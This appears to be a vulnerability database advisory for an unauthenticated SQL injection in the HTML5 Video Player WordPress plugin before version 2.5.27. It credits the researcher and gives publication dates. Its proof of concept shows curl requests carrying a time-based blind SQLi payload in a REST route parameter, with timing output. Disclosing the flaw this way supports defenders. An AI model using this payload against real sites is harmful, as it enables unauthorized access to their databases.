WordPress Plugin Vulnerabilities
HTML5 Video Player < 2.5.27 - Unauthenticated SQLi
Description
The plugin does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
Proof of Concept
% time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(5)))xyz)--+-" {"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.02s system 0% cpu 5.760 total % time curl "https://example.com/?rest_route=/h5vp/v1/video/1&id=1'+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))xyz)--+-" {"code":"not_found","message":"Data not found","data":{"status":404}}curl 0.01s user 0.01s system 1% cpu 1.204 total
Affects Plugins
References
CVE
Classification
Type
SQLI
OWASP top 10
CWE
Miscellaneous
Original Researcher
Mayank Deshmukh
Submitter
Mayank Deshmukh
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-05-30 (about 30 days ago)
Added
2024-05-30 (about 30 days ago)
Last Updated
2024-05-30 (about 30 days ago)